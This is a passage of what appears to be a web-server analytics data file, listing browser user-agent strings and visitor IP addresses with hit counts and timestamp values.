10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 4 0 0 0 9 0 0 29356487 0 0 28861291 0 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36 4 0 0 0 2 0 0 29354742 0 0 29354742 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 4 0 0 0 1 0 0 29371113 0 0 29371113 0 Mozilla/5.0 (Linux; Android 8.1.0; SM-J530F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 41 0 0 29411307 0 0 29259568 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29153691 0 0 29153691 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 4 0 0 0 1 0 0 29368326 0 0 29368326 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 5 0 0 0 188 0 0 29387345 0 0 29387344 0 20.119.226.238 5 0 0 0 1 0 0 29374014 0 0 29374014 0 34.148.150.79 5 0 0 0 1 0 0 29371113 0 0 29371113 0 2.57.122.173 5 0 0 0 1 0 0 28641362 0 0 28641362 0 51.89.167.1 5 0 0 0 2 0 0 29391897 0 0 29391897 0 195.178.110.156 5 0 0 0 2 0 0 29389234 0 0 29327545 0 195.178.110.155 5 0 0 0 1 0 0 28817057 0 0 28817057 0 104.198.189.226 5 0 0 0 1 0 0 28864706 0 0 28864706 0 34.136.238.74 5 0 0 0 1 0 0 28997124 0 0 28997124 0 34.73.34.180 5 0 0 0 1 0 0 29346574 0 0 29346574 0 91.196.152.70 5 0 0 0 8 0 0 29172736 0 0 29172736 0 23.105.110.236 5 0 0 0 1 0 0 28737653 0 0 28737653 0 45.148.10.142 5 0 0 0 1 0 0 29280747 0 0 29280747 0 54.195.5.90 5 0 0 0 1 0 0 29236659 0 0 29236659 0 172.121.217.13 5 0 0 0 2 0 0 29323924 0 0 29037586 0 45.148.10.140 5 0 0 0 2 0 0 28738948 0 0 28738948 0 35.86.239.250 5 0 0 0 131 0 0 29335672 0 0 29335672 0 20.27.26.223 5 0 0 0 1 0 0 29173578 0 0 29173578 0 91.196.152.57 5 0 0 0 2 0 0 28907419 0 0 28907419 0 165.22.233.14 5 0 0 0 1 0 0 29302650 0 0 29302650 0 66.249.64.44 5 0 0 0 20 0 0 29355357 0 0 29355357 0 35.227.29.211 5 0 0 0 1 0 0 29081469 0 0 29081469 0 91.196.152.52 5 0 0 0 1 0 0 29074752 0 0 29074752 0 184.73.146.41 5 0 0 0 3 0 0 28917114 0 0 28917114 0 167.172.184.244 5 0 0 0 5 0 0 29313662 0 0 29288348 0 66.249.64.36 5 0 0 0 1 0 0 28858468 0 0 28858468 0 87.236.176.15 5 0 0 0 1 0 0 29364971 0 0 29364971 0 91.196.152.47 5 0 0 0 1 0 0 29309231 0 0 29309231 0 195.178.110.130 5 0 0 0 3 0 0 29316389 0 0 29296294 0 66.249.64.35 5 0 0 0 7 0 0 29330824 0 0 29284784 0 66.249.64.34 5 0 0 0 1 0 0 29159531 0 0 29159531 0 68.183.145.0 5 1 0 0 0 28992843 0 0 28992843 0 0 87 52.12.247.26 5 0 0 0 3 0 0 28896702 0 0 28896702 0 64.23.136.149 5 0 0 0 20 0 0 29295857 0 0 29295857 0 34.82.229.153 5 0 0 0 2 0 0 29192463 0 0 29192463 0 64.226.93.222 5 0 0 0 3 0 0 28937821 0 0 28937821 0 45.55.226.44 5 1 0 0 0 29346542 0 0 29346542 0 0 87 54.245.15.173 5 1 0 0 0 29080865 0 0 29080865 0 0 87 13.212.104.15 5 0 0 0 272 0 0 29356484 0 0 29356483 0 3.139.71.137 5 0 0 0 2 0 0 29091876 0 0 29091876 0 64.23.172.110 5 0 0 0 10 0 0 29034500 0 0 28739571 0 35.171.144.152 5 1 0 0 0 29346542 0 0 29346542 0 0 87 13.61.16.151 5 0 0 0 1 0 0 29353656 0 0 29353656 0 212.233.85.102 5 0 0 0 2 0 0 29030112 0 0 29030112 0 90.22.103.31 5 0 0 0 2 0 0 29410639 0 0 29403111 0 195.24.236.50 5 0 0 0 2 0 0 28641542 0 0 28641542 0 54.247.57.72 5 0 0 0 1 0 0 28641368 0 0 28641368 0 94.176.92.211 5 0 0 0 1 0 0 29119946 0 0 29119946 0 44.203.84.116 5 0 0 0 1 0 0 28663132 0 0 28663132 0 46.48.152.108 5 0 0 0 1 0 0 29071308 0 0 29071308 0 84.247.132.142 5 0 0 0 1 0 0 28930759 0 0 28930759 0 18.201.213.227 5 0 0 0 1 0 0 29027254 0 0 29027254 0 47.82.11.71 5 0 0 0 4 0 0 28826293 0 0 28641426 0 51.81.46.212 5 0 0 0 2 0 0 28713202 0 0 28713202 0 78.153.140.224 5 0 0 0 1 0 0 28905253 0 0 28905253 0 37.187.74.97 5 0 0 0 2 0 0 28722781 0 0 28722781 0 78.153.140.222 5 0 0 0 1 0 0 29314920 0 0 29314920 0 196.251.72.221 5 0 0 0 1 0 0 29356612 0 0 29356612 0 44.222.164.49 5 0 0 0 2 0 0 29098866 0 0 29098866 0 13.37.230.118 5 0 0 0 2 0 0 29293861 0 0 29293813 0 44.211.241.10 5 0 0 0 3 0 0 29171109 0 0 29171109 0 47.82.60.100 5 0 0 0 4 0 0 28818193 0 0 28818193 0 68.183.90.98 5 0 0 0 1 0 0 29234139 0 0 29234139 0 47.82.11.55 5 0 0 0 2 0 0 28654788 0 0 28654788 0 46.101.150.68 5 0 0 0 2 0 0 29186955 0 0 29184679 0 196.251.72.212 5 0 0 0 1 0 0 29406460 0 0 29406460 0 172.121.217.166 5 0 0 0 3 0 0 29118653 0 0 29118653 0 157.245.70.221 5 0 0 0 1 0 0 29320964 0 0 29320964 0 35.224.23.203 5 0 0 0 20 0 0 29294834 0 0 29294834 0 34.63.181.195 5 0 0 0 1 0 0 29024105 0 0 29024105 0 47.82.11.46 5 0 0 0 8 0 0 29352250 0 0 29352250 0 34.135.74.58 5 0 0 0 1 0 0 29363937 0 0 29363937 0 213.177.100.45 5 0 0 0 2 0 0 29080250 0 0 29080250 0 146.190.249.38 5 0 0 0 1 0 0 29352439 0 0 29352439 0 213.155.227.119 5 0 0 0 138 0 0 29370559 0 0 29370559 0 20.39.203.102 5 0 0 0 1 0 0 29288735 0 0 29288735 0 196.251.83.56 5 0 0 0 2 0 0 29350507 0 0 29350507 0 164.90.194.236 5 0 0 0 2 0 0 29310621 0 0 29310621 0 159.203.45.52 5 0 0 0 1 0 0 29254325 0 0 29254325 0 47.82.11.41 5 0 0 0 2 0 0 29171395 0 0 29171395 0 98.225.176.254 5 0 0 0 4 0 0 28779138 0 0 28779138 0 172.225.228.31 5 0 0 0 2 0 0 28817418 0 0 28817418 0 103.125.233.16 5 0 0 0 2 0 0 28781747 0 0 28781747 0 172.225.228.30 5 0 0 0 2 0 0 28644521 0 0 28642284 0 171.67.70.238 5 0 0 0 2 0 0 28778858 0 0 28778858 0 172.225.228.27 5 0 0 0 1 0 0 29023550 0 0 29023550 0 47.82.11.35 5 0 0 0 2 0 0 28746576 0 0 28746576 0 172.225.228.24 5 0 0 0 2 0 0 28644142 0 0 28641608 0 171.67.70.233 5 0 0 0 1 0 0 29224150 0 0 29224150 0 47.82.11.33 5 0 0 0 1 0 0 29362482 0 0 29362482 0 196.251.83.100 5 0 0 0 1 0 0 29353673 0 0 29353673 0 185.216.193.170 5 0 0 0 2 0 0 28781743 0 0 28781743 0 172.225.228.23 5 0 0 0 2 0 0 28745164 0 0 28745164 0 172.225.228.21 5 0 0 0 1 0 0 28790107 0 0 28790107 0 107.181.244.204 5 0 0 0 4 0 0 28732973 0 0 28732970 0 37.248.246.58 5 0 0 0 9 0 0 29087932 0 0 29019479 0 45.61.146.184 5 0 0 0 12 0 0 28782045 0 0 28782045 0 172.225.228.17 5 0 0 0 2 0 0 29264507 0 0 29264507 0 143.110.214.231 5 0 0 0 2 0 0 28784011 0 0 28784011 0 172.225.228.16 5 0 0 0 4 0 0 28775843 0 0 28775843 0 68.183.140.184 5 0 0 0 2 0 0 28781193 0 0 28781193 0 172.225.228.12 5 0 0 0 70 0 0 29126039 0 0 29126038 0 152.42.165.25 5 0 0 0 1 0 0 29244227 0 0 29244227 0 47.82.11.18 5 0 0 0 2 0 0 28737213 0 0 28737213 0 37.248.246.46 5 0 0 0 20 0 0 29382376 0 0 29382376 0 136.111.192.202 5 0 0 0 2 0 0 28733119 0 0 28733119 0 5.27.47.136 5 0 0 0 2 0 0 29270362 0 0 29270362 0 31.171.152.102 5 0 0 0 1 0 0 29099990 0 0 29099990 0 121.78.21.82 5 0 0 0 1 0 0 29105756 0 0 29105756 0 63.33.58.191 5 0 0 0 21 0 0 29047497 0 0 29047497 0 146.70.194.238 5 0 0 0 2 0 0 28927608 0 0 28927608 0 167.71.96.71 5 0 0 0 4 0 0 28785790 0 0 28785790 0 46.101.59.12 5 0 0 0 1 0 0 29356734 0 0 29356734 0 35.217.51.29 5 0 0 0 1 0 0 28697867 0 0 28697867 0 5.255.231.46 5 0 0 0 1 0 0 29370803 0 0 29370803 0 109.254.81.196 5 0 0 0 156 0 0 29395728 0 0 29395728 0 74.176.63.146 5 0 0 0 1 0 0 29201352 0 0 29201352 0 35.230.185.223 5 0 0 0 2 0 0 28789594 0 0 28789594 0 172.225.252.4 5 0 0 0 4 0 0 29406403 0 0 29254465 0 18.224.192.118 5 0 0 0 4 0 0 28824000 0 0 28824000 0 165.232.126.12 5 0 0 0 8 0 0 29330527 0 0 29330526 0 15.181.145.26 5 0 0 0 2 0 0 29330074 0 0 29330074 0 128.199.7.75 5 1 0 0 0 29258704 0 0 29258704 0 0 87 13.58.15.216 5 0 0 0 65 0 0 29287581 0 0 29287581 0 13.201.48.46 5 0 0 0 15 0 0 28860417 0 0 28822637 0 104.28.40.2 5 0 0 0 1 0 0 29359022 0 0 29359022 0 34.1.26.165 5 0 0 0 2 0 0 29358846 0 0 29358846 0 109.196.64.59 5 0 0 0 1 0 0 29366771 0 0 29366771 0 34.12.81.68 5 1 1 0 1 28779138 0 28779138 28779138 0 28779138 772 172.225.252.17 5 0 0 0 2 0 0 28642473 0 0 28642473 0 164.92.73.191 5 0 0 0 1 0 0 29193005 0 0 29193005 0 63.35.196.117 5 0 0 0 2 0 0 29183891 0 0 29183890 0 147.182.254.0 5 0 0 0 2 0 0 29285866 0 0 29285866 0 81.29.134.51 5 0 0 0 3 0 0 29323749 0 0 29323749 0 2.58.56.223 5 0 0 0 4 0 0 28746071 0 0 28746071 0 64.226.111.208 5 0 0 0 1 0 0 29185748 0 0 29185748 0 34.145.135.248 5 0 0 0 1 0 0 29338965 0 0 29338965 0 2.58.56.222 5 0 0 0 1 0 0 29414679 0 0 29414679 0 167.94.138.187 5 0 0 0 79 0 0 29343317 0 0 29343317 0 52.169.13.133 5 0 0 0 1 0 0 29248453 0 0 29248453 0 2.58.56.215 5 0 0 0 1 0 0 29354819 0 0 29354819 0 87.236.176.244 5 0 0 0 4 0 0 28735768 0 0 28735767 0 157.245.212.202 5 0 0 0 1 0 0 28972999 0 0 28972999 0 54.152.114.116 5 0 0 0 131 0 0 29345798 0 0 29345798 0 52.169.67.182 5 0 0 0 16 0 0 28997211 0 0 28997210 0 149.102.252.48 5 0 0 0 152 0 0 29415979 0 0 29415978 0 4.218.20.75 5 0 0 0 8 0 0 28750388 0 0 28750387 0 107.150.101.57 5 1 0 0 0 28905003 0 0 28905003 0 0 87 35.89.216.197 5 0 0 0 1 0 0 29355149 0 0 29355149 0 34.1.29.0 5 0 0 0 1 0 0 29140436 0 0 29140436 0 87.236.176.235 5 0 0 0 1 0 0 28663132 0 0 28663132 0 188.95.92.83 5 0 0 0 3 0 0 29225109 0 0 29225108 0 167.94.138.167 5 0 0 0 1 0 0 28971757 0 0 28971757 0 87.236.176.229 5 0 0 0 1 0 0 28642695 0 0 28642695 0 87.236.176.228 5 0 0 0 1 0 0 29298999 0 0 29298999 0 87.236.176.227 5 10 4 0 10 28669736 0 28669736 28641367 0 28641367 7211 81.245.229.135 5 0 0 0 2 0 0 29368116 0 0 29368116 0 67.205.167.215 5 0 0 0 18 0 0 28729323 0 0 28729323 0 139.162.210.205 5 0 0 0 3 0 0 28886528 0 0 28886528 0 178.62.209.103 5 0 0 0 4 0 0 29311977 0 0 29264408 0 185.54.231.61 5 0 0 0 2 0 0 28697867 0 0 28697867 0 95.108.213.115 5 0 0 0 1 0 0 28806977 0 0 28806977 0 34.244.62.254 5 0 0 0 21 0 0 29060902 0 0 29060902 0 152.42.167.139 5 0 0 0 2 0 0 28659879 0 0 28659879 0 165.22.122.192 5 0 0 0 8 0 0 29174865 0 0 29174865 0 199.187.211.216 5 0 0 0 1 0 0 28803212 0 0 28803212 0 87.236.176.215 5 0 0 0 3 0 0 29109255 0 0 29109255 0 104.248.80.65 5 1 0 0 0 28817163 0 0 28817163 0 0 87 3.128.155.137 5 0 0 0 3 0 0 29158909 0 0 29158909 0 165.227.178.191 5 0 0 0 1 0 0 28714874 0 0 28714874 0 34.249.132.92 5 0 0 0 1 0 0 29015635 0 0 29015635 0 172.121.219.253 5 0 0 0 5 0 0 29364331 0 0 29364331 0 93.91.6.33 5 0 0 0 2 0 0 29104142 0 0 29104142 0 199.45.155.111 5 0 0 0 16 0 0 28993582 0 0 28993581 0 45.248.76.222 5 0 0 0 2 0 0 29348046 0 0 29348046 0 178.128.238.89 5 0 0 0 2 0 0 29286971 0 0 29286971 0 199.45.155.107 5 0 0 0 1 0 0 29015618 0 0 29015618 0 104.237.245.173 5 0 0 0 3 0 0 29260023 0 0 29260023 0 199.45.155.106 5 0 0 0 8 0 0 28770144 0 0 28770144 0 123.58.203.194 5 0 0 0 1 0 0 28641392 0 0 28641392 0 64.15.129.116 5 0 0 0 1 0 0 29159197 0 0 29159197 0 64.15.129.115 5 0 0 0 3 0 0 29048647 0 0 29048647 0 159.203.118.154 5 0 0 0 1 0 0 29159197 0 0 29159197 0 64.15.129.109 5 0 0 0 1 0 0 29362341 0 0 29362341 0 167.94.138.123 5 1 0 0 0 28905003 0 0 28905003 0 0 87 18.217.128.130 5 0 0 0 1 0 0 29083015 0 0 29083015 0 87.236.176.170 5 0 0 0 2 0 0 29144088 0 0 29144088 0 167.94.138.117 5 0 0 0 1 0 0 29159197 0 0 29159197 0 64.15.129.102 5 0 0 0 91 0 0 29385019 0 0 29385019 0 40.113.19.56 5 0 0 0 1 0 0 29159197 0 0 29159197 0 64.15.129.100 5 0 0 0 2 0 0 29152429 0 0 29151609 0 194.0.234.149 5 0 0 0 1 0 0 29015635 0 0 29015635 0 104.143.88.80 5 0 0 0 1 0 0 28647285 0 0 28647285 0 104.166.80.79 5 0 0 0 1 0 0 29191396 0 0 29191396 0 129.146.4.238 5 0 0 0 2 0 0 29269574 0 0 29269574 0 178.128.255.159 5 0 0 0 20 0 0 29374548 0 0 29374548 0 128.199.76.30 5 0 0 0 1 0 0 29338467 0 0 29338467 0 45.138.16.48 5 0 0 0 2 0 0 28921876 0 0 28921876 0 159.89.188.213 5 0 0 0 2 0 0 28675062 0 0 28675062 0 143.110.210.99 5 0 0 0 1 0 0 29357189 0 0 29357189 0 31.148.138.28 5 0 0 0 1 0 0 29103518 0 0 29103518 0 172.121.220.202 5 0 0 0 1 0 0 28684693 0 0 28684693 0 104.166.80.55 5 0 0 0 1 0 0 28641369 0 0 28641369 0 104.244.83.198 5 0 0 0 20 0 0 29360956 0 0 29360956 0 34.145.184.238 5 0 0 0 1 0 0 29271834 0 0 29271834 0 43.134.225.208 5 0 0 0 2 0 0 29140752 0 0 29140752 0 167.172.151.245 5 0 0 0 1 0 0 28644395 0 0 28644395 0 104.166.80.49 5 0 0 0 1 0 0 28803127 0 0 28803127 0 87.236.176.131 5 0 0 0 1 0 0 28650162 0 0 28650162 0 104.166.80.45 5 0 0 0 1 0 0 29061762 0 0 29061762 0 54.204.99.126 5 0 0 0 1 0 0 29014698 0 0 29014698 0 34.251.46.81 5 0 0 0 1 0 0 29182809 0 0 29182809 0 185.196.9.254 5 0 0 0 1 0 0 28756933 0 0 28756933 0 87.236.176.125 5 0 0 0 2 0 0 29340781 0 0 29340781 0 64.23.133.153 5 0 0 0 2 0 0 29093420 0 0 29093037 0 93.123.109.108 5 0 0 0 1 0 0 28819195 0 0 28819195 0 18.212.136.31 5 0 0 0 1 0 0 28700676 0 0 28700676 0 87.236.176.121 5 0 0 0 21 0 0 28694902 0 0 28680699 0 83.147.52.49 5 0 0 0 16 0 0 28993297 0 0 28993296 0 193.56.113.59 5 0 0 0 1 0 0 28846999 0 0 28846999 0 92.222.181.205 5 0 0 0 2 0 0 28817164 0 0 28641364 0 34.72.176.129 5 0 0 0 1 0 0 28680325 0 0 28680325 0 129.226.151.139 5 0 0 0 2 0 0 28729910 0 0 28729910 0 165.22.241.216 5 0 0 0 2 0 0 28907981 0 0 28907981 0 87.121.86.59 5 0 0 0 1 0 0 28643421 0 0 28643421 0 87.236.176.115 5 0 0 0 1 0 0 29099992 0 0 29099992 0 156.59.208.56 5 0 0 0 2 0 0 28826769 0 0 28826769 0 152.42.177.36 5 0 0 0 1 0 0 29205505 0 0 29205505 0 205.210.31.240 5 0 0 0 1 0 0 28930772 0 0 28930772 0 172.121.220.155 5 0 0 0 1 0 0 29364965 0 0 29364965 0 91.231.89.127 5 1 0 0 0 28992843 0 0 28992843 0 0 87 3.134.106.88 5 0 0 0 1 0 0 29346772 0 0 29346772 0 35.204.248.238 5 0 0 0 1 0 0 28903974 0 0 28903974 0 34.29.178.232 5 0 0 0 2 0 0 28999543 0 0 28999543 0 159.89.14.92 5 0 0 0 1 0 0 28655943 0 0 28655943 0 104.166.80.15 5 0 0 0 1 0 0 29157938 0 0 29157938 0 3.88.55.155 5 0 0 0 1 0 0 29173606 0 0 29173606 0 91.231.89.124 5 0 0 0 1 0 0 29029727 0 0 29029727 0 47.82.10.243 5 0 0 0 2 0 0 29261649 0 0 29261649 0 157.245.66.245 5 0 0 0 1 0 0 29309256 0 0 29309256 0 35.229.51.31 5 0 0 0 1 0 0 28681994 0 0 28681994 0 205.210.31.224 5 0 0 0 2 0 0 29077361 0 0 29077361 0 159.203.15.83 5 0 0 0 2 0 0 28972027 0 0 28972027 0 106.75.174.197 5 0 0 0 17 0 0 29268042 0 0 29264889 0 185.177.72.55 5 0 0 0 3 0 0 29358881 0 0 29358881 0 188.0.178.255 5 0 0 0 1 0 0 29155629 0 0 29155629 0 34.44.57.0 5 0 0 0 10 0 0 29232900 0 0 29232900 0 185.177.72.48 5 0 0 0 1 0 0 28996896 0 0 28996896 0 34.148.158.97 5 0 0 0 2 0 0 29371103 0 0 29371103 0 146.190.224.121 5 0 0 0 4 0 0 28763449 0 0 28763449 0 146.190.154.107 5 0 0 0 2 0 0 29225289 0 0 28999599 0 205.210.31.206 5 0 0 0 1 0 0 29346566 0 0 29346566 0 91.231.89.103 5 0 0 0 1 0 0 28659027 0 0 28659027 0 205.210.31.195 5 0 0 0 2 0 0 28859116 0 0 28859116 0 106.75.168.236 5 0 0 0 1 0 0 29139943 0 0 29139943 0 205.210.31.194 5 0 0 0 1 0 0 28806149 0 0 28806149 0 54.228.17.115 5 0 0 0 1 0 0 29220330 0 0 29220330 0 205.210.31.203 5 1 0 0 0 28729323 0 0 28729323 0 0 87 18.191.6.27 5 0 0 0 1 0 0 29121761 0 0 29121761 0 119.156.228.168 5 0 0 0 1 0 0 29019138 0 0 29019138 0 3.92.194.166 5 0 0 0 1 0 0 28982661 0 0 28982661 0 205.210.31.201 5 0 0 0 2 0 0 29030170 0 0 29030170 0 165.22.58.130 5 0 0 0 10 0 0 29232451 0 0 29232451 0 185.177.72.38 5 0 0 0 12 0 0 29208787 0 0 29208140 0 185.177.72.37 5 0 0 0 20 0 0 29208069 0 0 29200838 0 185.177.72.36 5 0 0 0 1 0 0 29373947 0 0 29373947 0 34.90.229.198 5 0 0 0 1 0 0 29363938 0 0 29363938 0 46.228.119.33 5 0 0 0 2 0 0 28807924 0 0 28807924 0 35.85.244.123 5 0 0 0 2 0 0 28910277 0 0 28910277 0 167.99.176.115 5 0 0 0 1 0 0 28953355 0 0 28953355 0 173.212.240.93 5 0 0 0 1 0 0 29349689 0 0 29349689 0 34.19.5.246 5 0 0 0 3 0 0 29207557 0 0 29197878 0 185.177.72.29 5 0 0 0 2 0 0 29177114 0 0 28835599 0 205.210.31.182 5 0 0 0 1 0 0 29092243 0 0 29092243 0 93.123.109.75 5 0 0 0 3 0 0 29068211 0 0 29068211 0 157.245.120.175 5 0 0 0 1 0 0 29026504 0 0 29026504 0 47.82.10.208 5 0 0 0 1 0 0 28714222 0 0 28714222 0 205.210.31.181 5 0 0 0 2 0 0 29321637 0 0 29221259 0 3.138.185.30 5 0 0 0 1 0 0 28641367 0 0 28641367 0 180.149.25.18 5 0 0 0 1 0 0 28730906 0 0 28730906 0 205.210.31.176 5 0 0 0 4 0 0 28817643 0 0 28641842 0 47.242.224.70 5 0 0 0 1 0 0 29020503 0 0 29020503 0 205.210.31.173 5 0 0 0 5 0 0 29357583 0 0 29357583 0 178.236.140.171 5 0 0 0 2 0 0 29368014 0 0 29338986 0 45.138.16.228 5 0 0 0 2 0 0 29319967 0 0 29319967 0 206.189.130.163 5 0 0 0 1 0 0 29138373 0 0 29138373 0 205.210.31.172 5 0 0 0 1 0 0 28979737 0 0 28979737 0 205.210.31.168 5 4 4 0 1 28641362 0 28641362 28641362 0 28641362 2037 57.129.16.41 5 0 0 0 1 0 0 29240850 0 0 29240850 0 205.210.31.166 5 0 0 0 1 0 0 28912814 0 0 28912814 0 205.210.31.164 5 0 0 0 1 0 0 29201596 0 0 29201596 0 83.192.34.201 5 0 0 0 2 0 0 29294872 0 0 29294872 0 93.123.109.58 5 0 0 0 1 0 0 29371191 0 0 29371191 0 205.210.31.163 5 0 0 0 20 0 0 29375359 0 0 29375359 0 34.75.128.133 5 0 0 0 8 0 0 28739847 0 0 28739846 0 165.154.187.159 5 0 0 0 16 0 0 28995854 0 0 28995854 0 87.249.133.69 5 0 0 0 3 0 0 29306792 0 0 29306792 0 193.233.203.207 5 0 0 0 1 0 0 29103518 0 0 29103518 0 104.237.245.51 5 0 0 0 2 0 0 28738750 0 0 28732275 0 205.210.31.156 5 0 0 0 1 0 0 29103520 0 0 29103520 0 107.172.123.200 5 0 0 0 3 0 0 28927142 0 0 28927142 0 198.199.77.42 5 0 0 0 1 0 0 29249482 0 0 29249482 0 194.233.82.231 5 0 0 0 1 0 0 29327020 0 0 29327020 0 205.210.31.149 5 0 0 0 1 0 0 28661375 0 0 28661375 0 205.210.31.148 5 0 0 0 3 0 0 29028479 0 0 29028479 0 165.22.189.62 5 0 0 0 83 0 0 29381256 0 0 29381255 0 48.210.57.6 5 0 0 0 2 0 0 28905012 0 0 28729329 0 88.99.26.177 5 0 0 0 12 0 0 29171690 0 0 29171689 0 13.39.111.126 5 0 0 0 1 0 0 29016569 0 0 29016569 0 205.210.31.141 5 0 0 0 1 0 0 29357047 0 0 29357047 0 44.211.244.136 5 0 0 0 1 0 0 28663132 0 0 28663132 0 141.95.67.140 5 0 0 0 3 0 0 29307525 0 0 28718294 0 205.210.31.132 5 0 0 0 1 0 0 29224194 0 0 29224194 0 18.236.104.120 5 0 0 0 2 0 0 28811619 0 0 28795203 0 92.118.39.244 5 0 0 0 4 0 0 28826323 0 0 28826323 0 138.197.79.213 5 0 0 0 1 0 0 29236604 0 0 29236604 0 104.237.245.24 5 0 0 0 1 0 0 28727664 0 0 28727664 0 206.168.34.210 5 0 0 0 12 0 0 29117507 0 0 29117506 0 13.37.213.14 5 0 0 0 2 0 0 29178132 0 0 29178132 0 134.122.96.235 5 0 0 0 1 0 0 29314951 0 0 29314951 0 206.168.34.196 5 0 0 0 193 0 0 29352213 0 0 29344750 0 52.169.206.229 5 0 0 0 1 0 0 28727585 0 0 28727585 0 206.168.34.204 5 0 0 0 1 0 0 28808576 0 0 28808576 0 206.168.34.194 5 0 0 0 1 0 0 29395985 0 0 29395985 0 206.168.34.193 5 0 0 0 1 0 0 28665992 0 0 28665992 0 147.185.132.243 5 0 0 0 1 0 0 29250910 0 0 29250910 0 20.171.207.57 5 2 0 2 0 28695144 28695144 0 28695144 28695144 0 8470 142.93.131.215 5 0 0 0 7 0 0 28957163 0 0 28739571 0 54.88.179.33 5 0 0 0 1 0 0 29264639 0 0 29264639 0 35.209.202.171 5 0 0 0 1 0 0 29172038 0 0 29172038 0 184.72.105.4 5 0 0 0 1 0 0 28978557 0 0 28978557 0 46.137.54.162 5 0 0 0 1 0 0 28887585 0 0 28887585 0 34.255.29.180 5 0 0 0 1 0 0 28688274 0 0 28688274 0 147.185.132.240 5 0 0 0 6 0 0 28974063 0 0 28974063 0 146.190.107.144 5 0 0 0 3 0 0 29372913 0 0 29372913 0 185.26.73.41 5 0 0 0 3 0 0 28936062 0 0 28936062 0 206.189.82.178 5 0 0 0 1 0 0 29189958 0 0 29189958 0 205.210.31.111 5 0 0 0 21 0 0 29154011 0 0 29154011 0 82.102.18.190 5 0 0 0 3 0 0 28716787 0 0 28665921 0 195.211.77.142 5 0 0 0 5 0 0 29358297 0 0 29358297 0 46.53.240.7 5 0 0 0 1 0 0 29030344 0 0 29030344 0 47.82.0.163 5 1 0 0 0 29080865 0 0 29080865 0 0 87 16.16.160.208 5 0 0 0 3 0 0 28817164 0 0 28641362 0 195.211.77.140 5 0 0 0 1 0 0 29093760 0 0 29093760 0 205.210.31.105 5 0 0 0 1 0 0 28986922 0 0 28986922 0 82.197.68.199 5 0 0 0 1 0 0 29063838 0 0 29063838 0 165.1.74.245 5 0 0 0 1 0 0 28730052 0 0 28730052 0 47.251.11.3 5 0 0 0 1 0 0 29236659 0 0 29236659 0 104.224.66.95 5 0 0 0 113 0 0 29365203 0 0 29365203 0 4.233.93.60 5 0 0 0 1 0 0 29194745 0 0 29194745 0 147.185.132.222 5 0 0 0 1 0 0 28651606 0 0 28651606 0 104.166.80.254 5 1 0 0 0 28641362 0 0 28641362 0 0 87 16.16.195.150 5 0 0 0 1 0 0 28905253 0 0 28905253 0 51.75.141.254 5 0 0 0 1 0 0 29035726 0 0 29035726 0 128.199.21.252 5 0 0 0 2 0 0 29219635 0 0 29219635 0 159.89.2.78 5 0 0 0 1 0 0 29360579 0 0 29360579 0 5.188.9.126 5 0 0 0 4 0 0 28817185 0 0 28817184 0 64.225.15.249 5 0 0 0 1 0 0 29197161 0 0 29197161 0 185.247.137.46 5 0 0 0 2 0 0 28906455 0 0 28906455 0 106.75.168.5 5 0 0 0 2 0 0 29189420 0 0 29189420 0 64.226.118.100 5 0 0 0 1 0 0 28645855 0 0 28645855 0 104.166.80.247 5 0 0 0 2 0 0 29411307 0 0 29411307 0 152.42.128.193 5 0 0 0 2 0 0 29347757 0 0 29347757 0 5.188.9.124 5 0 0 0 1 0 0 29099863 0 0 29099863 0 147.185.132.213 5 0 0 0 1 0 0 29366690 0 0 29366690 0 34.56.255.139 5 0 0 0 2 0 0 29114957 0 0 29114957 0 159.89.9.88 5 1 0 0 0 28992843 0 0 28992843 0 0 87 13.229.147.183 5 0 0 0 2 0 0 29174258 0 0 29174258 0 173.91.201.116 5 0 0 0 3 0 0 28641369 0 0 28641368 0 168.151.102.250 5 0 0 0 1 0 0 29255059 0 0 29255059 0 185.247.137.35 5 0 0 0 2 0 0 28705360 0 0 28705360 0 139.59.42.129 5 0 0 0 1 0 0 29001796 0 0 29001796 0 162.142.125.39 5 0 0 0 1 0 0 29104747 0 0 29104747 0 147.185.132.201 5 0 0 0 1 0 0 28988844 0 0 28988844 0 147.185.132.189 5 0 0 0 2 0 0 29401374 0 0 29401374 0 159.65.30.237 5 0 0 0 2 0 0 29390821 0 0 29390821 0 159.203.14.187 5 0 0 0 1 0 0 29164005 0 0 29164005 0 80.94.97.38 5 0 0 0 3 0 0 28951120 0 0 28951120 0 209.38.123.46 5 0 0 0 6 0 0 28730767 0 0 28730766 0 37.248.248.107 5 0 0 0 1 0 0 28661672 0 0 28661672 0 104.166.80.228 5 0 0 0 2 0 0 28930444 0 0 28930444 0 64.23.135.193 5 0 0 0 79 0 0 29378467 0 0 29378466 0 40.122.52.254 5 0 0 0 1 0 0 28918380 0 0 28918380 0 185.247.137.23 5 0 0 0 1 0 0 28877082 0 0 28877082 0 103.163.214.6 5 0 0 0 1 0 0 29008980 0 0 29008980 0 147.185.132.180 5 0 0 0 1 0 0 28839572 0 0 28839572 0 104.224.66.61 5 0 0 0 134 0 0 29346262 0 0 29346261 0 13.78.92.216 5 0 0 0 2 0 0 28770670 0 0 28770670 0 34.222.190.224 5 3 3 0 15 28641362 0 28641362 28641362 0 28641362 3708 64.226.78.121 5 0 0 0 3 0 0 28730780 0 0 28730780 0 104.28.131.161 5 0 0 0 1 0 0 29109772 0 0 29109772 0 147.185.132.174 5 0 0 0 2 0 0 28643072 0 0 28641946 0 35.175.175.118 5 0 0 0 1 0 0 28730780 0 0 28730780 0 104.28.131.160 5 0 0 0 2 0 0 29249610 0 0 29249610 0 139.59.163.56 5 0 0 0 2 0 0 28846845 0 0 28846845 0 143.110.254.254 5 0 0 0 1 0 0 29370684 0 0 29370684 0 18.197.104.223 5 0 0 0 1 0 0 29406460 0 0 29406460 0 172.121.222.197 5 0 0 